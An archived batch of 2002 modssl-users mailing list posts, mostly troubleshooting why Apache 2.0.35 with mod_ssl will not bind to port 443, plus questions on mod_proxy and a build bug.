>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > admin & senior security consultant: sysinfo.com > > http://sysinfo.com > > > >"Cutting the space budget really restores my faith in humanity. It > >eliminates dreams, goals, and ideals and lets us get straight to the > >business of hate, debauchery, and self-annihilation." > > -- Johnny Hart > > > >testing, only testing, and damn good at it too! > > > > > > > _________________________________________________________________ > Get your FREE download of MSN Explorer at > http://explorer.msn.com/intl.asp. > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 15:31:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA23564; Mon, 15 Apr 2002 15:30:21 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id PAA23523; Mon, 15 Apr 2002 15:30:02 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 15 Apr 2002 06:18:01 -0700 Received: from 134.32.101.94 by lw7fd.law7.hotmail.msn.com with HTTP; Mon, 15 Apr 2002 13:18:01 GMT X-Originating-IP: [134.32.101.94] From: "paul priestman" To: dufresne@sysinfo.com Cc: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start Date: Mon, 15 Apr 2002 13:18:01 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 15 Apr 2002 13:18:01.0504 (UTC) FILETIME=[F7F43200:01C1E47F] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "paul priestman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users i'm actually trying to run this server on port 8443 - the other httpd runs on port 443 but i have stopped this server running (as its just another test server). I am starting the server as my self - not as root but the port is > 1024 anyway I have tried chaning the port to other numbers aswell but to no luck.... Paul >From: "R. DuFresne" >To: paul priestman >CC: modssl-users@modssl.org >Subject: Re: Apache 2.0.35 with SSL - wont start >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > >You're not trying to run two httpd's on the same set of ports are you, the >old one running while trying to fire up the new? > >that's what the error suggests I think... > >thanks, > >Ron DuFresne > >On Mon, 15 Apr 2002, paul priestman wrote: > > > Hello all, > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have >configured > > the httpd.conf as they suggest in ssl.conf. However, when i try to >start > > apachectl i get the following message: > > > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > > no listening sockets available, shutting down > > ./apachectl startssl: httpd could not be started > > > > Has anyone any ideas what i'm doing wrong - i have succesfully got ssl > > working with apache 1.3.22. > > > > Thanks for your time > > > > Paul > > > > _________________________________________________________________ > > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > >-- >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > admin & senior security consultant: sysinfo.com > http://sysinfo.com > >"Cutting the space budget really restores my faith in humanity. It >eliminates dreams, goals, and ideals and lets us get straight to the >business of hate, debauchery, and self-annihilation." > -- Johnny Hart > >testing, only testing, and damn good at it too! > _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 16:30:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA26653; Mon, 15 Apr 2002 16:29:26 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns1.microanswers.net id QAA26630; Mon, 15 Apr 2002 16:28:45 +0200 (MET DST) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g3FEDhR18091 for ; Mon, 15 Apr 2002 09:13:43 -0500 Message-ID: <02fd01c1e489$95ebde00$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: Subject: Re: Apache 2.0.35 with SSL - wont start Date: Mon, 15 Apr 2002 09:26:51 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear Paul, RE:>>(13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 no listening sockets available, shutting down AND I have tried changing the port to other numbers as well but to no luck.... ------------------- Just a thought... can you ping to that IP address of 0.0.0.0? And is this a port that you can bind to? Seems like it ought to be either a private C Class address, or some other address than the default of 0.0.0.0. In other words, are you certain that you can direct TCP/IP framed packets through this IP address? Andrew Lietzow The ACL Group, Inc. ----- Original Message ----- From: "paul priestman" To: Cc: Sent: Monday, April 15, 2002 8:18 AM Subject: Re: Apache 2.0.35 with SSL - wont start > i'm actually trying to run this server on port 8443 - the other httpd runs > on port 443 but i have stopped this server running (as its just another test > server). I am starting the server as my self - not as root but the port is > > 1024 anyway > > I have tried chaning the port to other numbers aswell but to no luck.... > > Paul > > >From: "R. DuFresne" > >To: paul priestman > >CC: modssl-users@modssl.org > >Subject: Re: Apache 2.0.35 with SSL - wont start > >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > > > > >You're not trying to run two httpd's on the same set of ports are you, the > >old one running while trying to fire up the new? > > > >that's what the error suggests I think... > > > >thanks, > > > >Ron DuFresne > > > >On Mon, 15 Apr 2002, paul priestman wrote: > > > > > Hello all, > > > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have > >configured > > > the httpd.conf as they suggest in ssl.conf. However, when i try to > >start > > > apachectl i get the following message: > > > > > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > > > no listening sockets available, shutting down > > > ./apachectl startssl: httpd could not be started > > > > > > Has anyone any ideas what i'm doing wrong - i have succesfully got ssl > > > working with apache 1.3.22. > > > > > > Thanks for your time > > > > > > Paul > > > > > > _________________________________________________________________ > > > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > > > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > > User Support Mailing List modssl-users@modssl.org > > > Automated List Manager majordomo@modssl.org > > > > > > >-- > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > admin & senior security consultant: sysinfo.com > > http://sysinfo.com > > > >"Cutting the space budget really restores my faith in humanity. It > >eliminates dreams, goals, and ideals and lets us get straight to the > >business of hate, debauchery, and self-annihilation." > > -- Johnny Hart > > > >testing, only testing, and damn good at it too! > > > > > > > _________________________________________________________________ > Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 16:43:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA27255; Mon, 15 Apr 2002 16:42:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.dicecorp.com id QAA27247; Mon, 15 Apr 2002 16:41:46 +0200 (MET DST) Received: from DRAGON (internal154.dicecorp.com [192.168.100.154]) by www.dicecorp.com (8.11.1/8.11.1) with ESMTP id g3FEfda25277 for ; Mon, 15 Apr 2002 10:41:39 -0400 From: "Jeremy Walton" To: Subject: RE: Apache 2.0.35 with SSL - wont start Date: Mon, 15 Apr 2002 10:41:48 -0400 Message-ID: <007001c1e48b$ac872690$9a64a8c0@DRAGON> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: <02fd01c1e489$95ebde00$4d38e63f@microanswers.net> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeremy Walton" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users 0.0.0.0 tells the OS to bind to all network adapters. Its not really a usable IP address. Jeremy Walton DICE Corporation -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Andrew Lietzow Sent: Monday, April 15, 2002 10:27 AM To: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start Dear Paul, RE:>>(13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 no listening sockets available, shutting down AND I have tried changing the port to other numbers as well but to no luck.... ------------------- Just a thought... can you ping to that IP address of 0.0.0.0? And is this a port that you can bind to? Seems like it ought to be either a private C Class address, or some other address than the default of 0.0.0.0. In other words, are you certain that you can direct TCP/IP framed packets through this IP address? Andrew Lietzow The ACL Group, Inc. ----- Original Message ----- From: "paul priestman" To: Cc: Sent: Monday, April 15, 2002 8:18 AM Subject: Re: Apache 2.0.35 with SSL - wont start > i'm actually trying to run this server on port 8443 - the other httpd > runs on port 443 but i have stopped this server running (as its just > another test > server). I am starting the server as my self - not as root but the > port is > > 1024 anyway > > I have tried chaning the port to other numbers aswell but to no > luck.... > > Paul > > >From: "R. DuFresne" > >To: paul priestman > >CC: modssl-users@modssl.org > >Subject: Re: Apache 2.0.35 with SSL - wont start > >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > > > > >You're not trying to run two httpd's on the same set of ports are > >you, the > >old one running while trying to fire up the new? > > > >that's what the error suggests I think... > > > >thanks, > > > >Ron DuFresne > > > >On Mon, 15 Apr 2002, paul priestman wrote: > > > > > Hello all, > > > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have > >configured > > > the httpd.conf as they suggest in ssl.conf. However, when i try > > > to > >start > > > apachectl i get the following message: > > > > > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > > > no listening sockets available, shutting down > > > ./apachectl startssl: httpd could not be started > > > > > > Has anyone any ideas what i'm doing wrong - i have succesfully got > > > ssl working with apache 1.3.22. > > > > > > Thanks for your time > > > > > > Paul > > > > > > _________________________________________________________________ > > > Chat with friends online, try MSN Messenger: > > > http://messenger.msn.com > > > > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > > User Support Mailing List modssl-users@modssl.org > > > Automated List Manager majordomo@modssl.org > > > > > > >-- > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > admin & senior security consultant: sysinfo.com > > http://sysinfo.com > > > >"Cutting the space budget really restores my faith in humanity. It > >eliminates dreams, goals, and ideals and lets us get straight to the > >business of hate, debauchery, and self-annihilation." > > -- Johnny Hart > > > >testing, only testing, and damn good at it too! > > > > > > > _________________________________________________________________ > Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 16:56:31 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA27880; Mon, 15 Apr 2002 16:55:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id QAA27868; Mon, 15 Apr 2002 16:54:48 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 15 Apr 2002 07:54:41 -0700 Received: from 134.32.101.94 by lw7fd.law7.hotmail.msn.com with HTTP; Mon, 15 Apr 2002 14:54:41 GMT X-Originating-IP: [134.32.101.94] From: "paul priestman" To: dufresne@sysinfo.com Cc: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start Date: Mon, 15 Apr 2002 14:54:41 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 15 Apr 2002 14:54:41.0922 (UTC) FILETIME=[7945BE20:01C1E48D] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "paul priestman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users So its trying to bind to 443 - i have stated in my ssl.conf to listen on port 8443 and have set up a virtual host for port 8443 with ssl enabled - how come it tries to bind to port 443? I have therefore tried to start the server as root - it started okay but I cannot make a ssl connection - i goto https://servername.com:443 but get a server error telling me i could not connect to server - in the error logs i get: mod_ssl: Unable to set session id context to 'servername.com:443' (OpenSSL library error follows) OpenSSL: error:140DA111::lib(20) :func(218) :reason(273) > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > > no listening sockets available, shutting down > > ./apachectl startssl: httpd could not be started > > It's *not* trying to start on 8443 though... thanks, Ron DuFresne On Mon, 15 Apr 2002, paul priestman wrote: >i'm actually trying to run this server on port 8443 - the other httpd runs >on port 443 but i have stopped this server running (as its just another >test server). I am starting the server as my self - not as root but the >port is > 1024 anyway > >I have tried chaning the port to other numbers aswell but to no luck.... > >Paul > > >From: "R. DuFresne" > >To: paul priestman > >CC: modssl-users@modssl.org > >Subject: Re: Apache 2.0.35 with SSL - wont start > >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > > > > >You're not trying to run two httpd's on the same set of ports are you, >the > >old one running while trying to fire up the new? > > > >that's what the error suggests I think... > > > >thanks, > > > >Ron DuFresne > > > >On Mon, 15 Apr 2002, paul priestman wrote: > > > > > Hello all, > > > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have > >configured > > > the httpd.conf as they suggest in ssl.conf. However, when i try to > >start > > > apachectl i get the following message: > > > >From: "R. DuFresne" >To: paul priestman >CC: modssl-users@modssl.org >Subject: Re: Apache 2.0.35 with SSL - wont start >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > >You're not trying to run two httpd's on the same set of ports are you, the >old one running while trying to fire up the new? > >that's what the error suggests I think... > >thanks, > >Ron DuFresne > >On Mon, 15 Apr 2002, paul priestman wrote: > > > Hello all, > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have >configured > > the httpd.conf as they suggest in ssl.conf. However, when i try to >start > > apachectl i get the following message: > > > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > > no listening sockets available, shutting down > > ./apachectl startssl: httpd could not be started > > > > Has anyone any ideas what i'm doing wrong - i have succesfully got ssl > > working with apache 1.3.22. > > > > Thanks for your time > > > > Paul > > > > _________________________________________________________________ > > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > >-- >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > admin & senior security consultant: sysinfo.com > http://sysinfo.com > >"Cutting the space budget really restores my faith in humanity. It >eliminates dreams, goals, and ideals and lets us get straight to the >business of hate, debauchery, and self-annihilation." > -- Johnny Hart > >testing, only testing, and damn good at it too! > _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 17:15:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA29099; Mon, 15 Apr 2002 17:14:07 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA29078; Mon, 15 Apr 2002 17:13:34 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 5D5CD4CE743; Mon, 15 Apr 2002 17:13:33 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3FFBbD36876; Mon, 15 Apr 2002 17:11:37 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from m1.bezeqint.net id KAA10092; Mon, 15 Apr 2002 10:55:13 +0200 (MET DST) Received: from beamartyr.net (bzq-212-194.red.bezeqint.net [212.179.212.194]) by m1.bezeqint.net (Mirapoint) with ESMTP id AXV53433; Mon, 15 Apr 2002 11:55:06 +0300 (IDT) Received: from beamartyr.net ([192.168.10.26]) by beamartyr.net (8.11.6/linuxconf) with ESMTP id g3F8t3P03491; Mon, 15 Apr 2002 11:55:05 +0300 Message-ID: <3CBA9567.8020906@beamartyr.net> Date: Mon, 15 Apr 2002 11:55:03 +0300 From: Issac Goldstand User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.9) Gecko/20020326 X-Accept-Language: en-us, en MIME-Version: 1.0 To: R.K.Hillman@bton.ac.uk Cc: modssl-users Subject: Re: Problems building Apache 2.0.35 with mod_ssl enabled Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Issac Goldstand X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users It's fixed in Apache's CVS version. See bugzilla bug 7802 (http://nagoya.apache.org/bugzilla/show_bug.cgi?id=7802) Issac ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 17:15:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA29111; Mon, 15 Apr 2002 17:14:17 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA29076; Mon, 15 Apr 2002 17:13:34 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 4F5EB4CE740; Mon, 15 Apr 2002 17:13:33 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3FFBX536870; Mon, 15 Apr 2002 17:11:33 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from m2.bezeqint.net id KAA09912; Mon, 15 Apr 2002 10:50:04 +0200 (MET DST) Received: from beamartyr.net (bzq-212-194.red.bezeqint.net [212.179.212.194]) by m2.bezeqint.net (Mirapoint) with ESMTP id AXL36140; Mon, 15 Apr 2002 11:48:36 +0300 (IDT) Received: from beamartyr.net ([192.168.10.26]) by beamartyr.net (8.11.6/linuxconf) with ESMTP id g3F8mXP03477 for ; Mon, 15 Apr 2002 11:48:34 +0300 Message-ID: <3CBA93E1.1080007@beamartyr.net> Date: Mon, 15 Apr 2002 11:48:33 +0300 From: Issac Goldstand User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.9) Gecko/20020326 X-Accept-Language: en-us, en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: mod_ssl-2.0.35 + mod_proxy Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Issac Goldstand X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I've just upgraded my front-end server to Apache 2.0.35/mod_ssl/openssl-0.9.6b When I try to connect to an https virtualhost, however, the connection just seems to hang there. Now, the backend is NOT running mod_ssl (under Apache 1.3, it didn't have to). Does it have to, now? the engine_log is reporting: [15/Apr/2002 02:36:15 02228] [warn] Failed to acquire global mutex lock [15/Apr/2002 02:36:15 02228] [warn] Failed to release global mutex lock [15/Apr/2002 02:36:15 02228] [info] Connection: Client IP: 192.168.10.26, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits) [15/Apr/2002 02:36:15 02228] [info] Connection to child 67 established (server beamartyr.net:443, client 192.168.1.11) The first bit worries me a bit - I have no idea what it means.. The last bit seems to imply that mod_ssl is working in conjunction with mod_proxy to tunnel the SSL connection to the back-end (meaning that the back-end would need to be running mod_ssl). Is this so? If so, is there a way to disable this behavior (the idea being that the back-end app-server is doing quite enough as it is without needing encryption overhead too :)) Please cc me in replies. Thanks, Issac ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 17:20:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA29432; Mon, 15 Apr 2002 17:19:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id RAA29351; Mon, 15 Apr 2002 17:18:17 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id RAA02720 for ; Mon, 15 Apr 2002 17:18:11 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma002718; Mon, 15 Apr 02 17:18:06 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id RAA02105 for ; Mon, 15 Apr 2002 17:18:05 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id RAA20541 for ; Mon, 15 Apr 2002 17:18:05 +0200 (MEST) Message-ID: <3CBAEF2D.6BBE8BC2@bourse.ch> Date: Mon, 15 Apr 2002 17:18:05 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users paul priestman wrote: > > So its trying to bind to 443 - i have stated in my ssl.conf to listen on > port 8443 and have set up a virtual host for port 8443 with ssl enabled - > how come it tries to bind to port 443? > > I have therefore tried to start the server as root - it started okay but I > cannot make a ssl connection - i goto https://servername.com:443 but get a > server error telling me i could not connect to server - in the error logs i > get: > mod_ssl: Unable to set session id context to 'servername.com:443' (OpenSSL > library error follows) What's this about ssl.conf? Are you "including" this file into httpd.conf at runtime? If so, I have a nasty suspicion that you have two SSL VHs defined - perhaps an old one in httpd.conf which is trying to Listen to port 433 (therefore causing a no permission error when you try to start as a normal user) but when you do start as root still fails because its docroot or certificates or something is missing (since it is an old VH - anything is possible). Can you thoroughly check (or even post!) all your config information... Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 17:26:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA29907; Mon, 15 Apr 2002 17:25:28 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns1.microanswers.net id RAA29850; Mon, 15 Apr 2002 17:24:53 +0200 (MET DST) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g3FF9pR18206 for ; Mon, 15 Apr 2002 10:09:51 -0500 Message-ID: <031701c1e491$6c8aa160$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <007001c1e48b$ac872690$9a64a8c0@DRAGON> Subject: Re: Apache 2.0.35 with SSL - wont start Date: Mon, 15 Apr 2002 10:22:58 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello Jeremy, RE>::> 0.0.0.0 tells the OS to bind to all network adapters. Its not really a > usable IP address. -------- Maybe this is a bit off subject, but doesn't the Apache web server have to bind to a specific network interface? If you are trying to have it listen for packets on 443 or 8443, or whatever, you couldn't have it listen to four (or some other multiple of one) IP addresses and associated ports simultaneously... or could you? I mean it might be "able" to do it, but how would it know how to control traffic without specifically binding addresses to an interface, whether they be static, or at least IP-masqueraded (as in NAT). Just for testing purposes, if one could say, either in the main server or in a virtual host directive: Listen _default_:* with one network interface, what would happen if you had multiple network interfaces? The httpd daemon would start for the first one, possibly, but could it route traffic for all of the interfaces and not know specific IP address for those cards? Obviously, I'm confused. This will eventually lead to my burning question of how to setup multiple secure servers with the VirtualHost directive. I think I can do this by assigning each server to a different port address but I'm not quite there yet. Andrew Lietzow The ACL Group, Inc. ----- Original Message ----- From: "Jeremy Walton" To: Sent: Monday, April 15, 2002 9:41 AM Subject: RE: Apache 2.0.35 with SSL - wont start > 0.0.0.0 tells the OS to bind to all network adapters. Its not really a > usable IP address. > > Jeremy Walton > DICE Corporation > > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org] On Behalf Of Andrew Lietzow > Sent: Monday, April 15, 2002 10:27 AM > To: modssl-users@modssl.org > Subject: Re: Apache 2.0.35 with SSL - wont start > > > Dear Paul, > RE:>>(13)Permission denied: make_sock: could not bind to address > 0.0.0.0:443 no listening sockets available, shutting down AND I have > tried changing the port to other numbers as well but to no luck.... > ------------------- > Just a thought... can you ping to that IP address of 0.0.0.0? And is > this a port that you can bind to? Seems like it ought to be either a > private C Class address, or some other address than the default of > 0.0.0.0. > > In other words, are you certain that you can direct TCP/IP framed > packets through this IP address? > > Andrew Lietzow > The ACL Group, Inc. > > > > ----- Original Message ----- > From: "paul priestman" > To: > Cc: > Sent: Monday, April 15, 2002 8:18 AM > Subject: Re: Apache 2.0.35 with SSL - wont start > > > > i'm actually trying to run this server on port 8443 - the other httpd > > runs on port 443 but i have stopped this server running (as its just > > another > test > > server). I am starting the server as my self - not as root but the > > port > is > > > 1024 anyway > > > > I have tried chaning the port to other numbers aswell but to no > > luck.... > > > > Paul > > > > >From: "R. DuFresne" > > >To: paul priestman > > >CC: modssl-users@modssl.org > > >Subject: Re: Apache 2.0.35 with SSL - wont start > > >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > > > > > > > >You're not trying to run two httpd's on the same set of ports are > > >you, > the > > >old one running while trying to fire up the new? > > > > > >that's what the error suggests I think... > > > > > >thanks, > > > > > >Ron DuFresne > > > > > >On Mon, 15 Apr 2002, paul priestman wrote: > > > > > > > Hello all, > > > > > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have > > >configured > > > > the httpd.conf as they suggest in ssl.conf. However, when i try > > > > to > > >start > > > > apachectl i get the following message: > > > > > > > > (13)Permission denied: make_sock: could not bind to address > 0.0.0.0:443 > > > > no listening sockets available, shutting down > > > > ./apachectl startssl: httpd could not be started > > > > > > > > Has anyone any ideas what i'm doing wrong - i have succesfully got > > > > > ssl working with apache 1.3.22. > > > > > > > > Thanks for your time > > > > > > > > Paul > > > > > > > > _________________________________________________________________ > > > > Chat with friends online, try MSN Messenger: > > > > http://messenger.msn.com > > > > > > > > > ______________________________________________________________________ > > > > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > > > > User Support Mailing List > modssl-users@modssl.org > > > > Automated List Manager > majordomo@modssl.org > > > > > > > > > >-- > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > > admin & senior security consultant: sysinfo.com > > > http://sysinfo.com > > > > > >"Cutting the space budget really restores my faith in humanity. It > > >eliminates dreams, goals, and ideals and lets us get straight to the > > >business of hate, debauchery, and self-annihilation." > > > -- Johnny Hart > > > > > >testing, only testing, and damn good at it too! > > > > > > > > > > > > > _________________________________________________________________ > > Get your FREE download of MSN Explorer at > http://explorer.msn.com/intl.asp. > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) 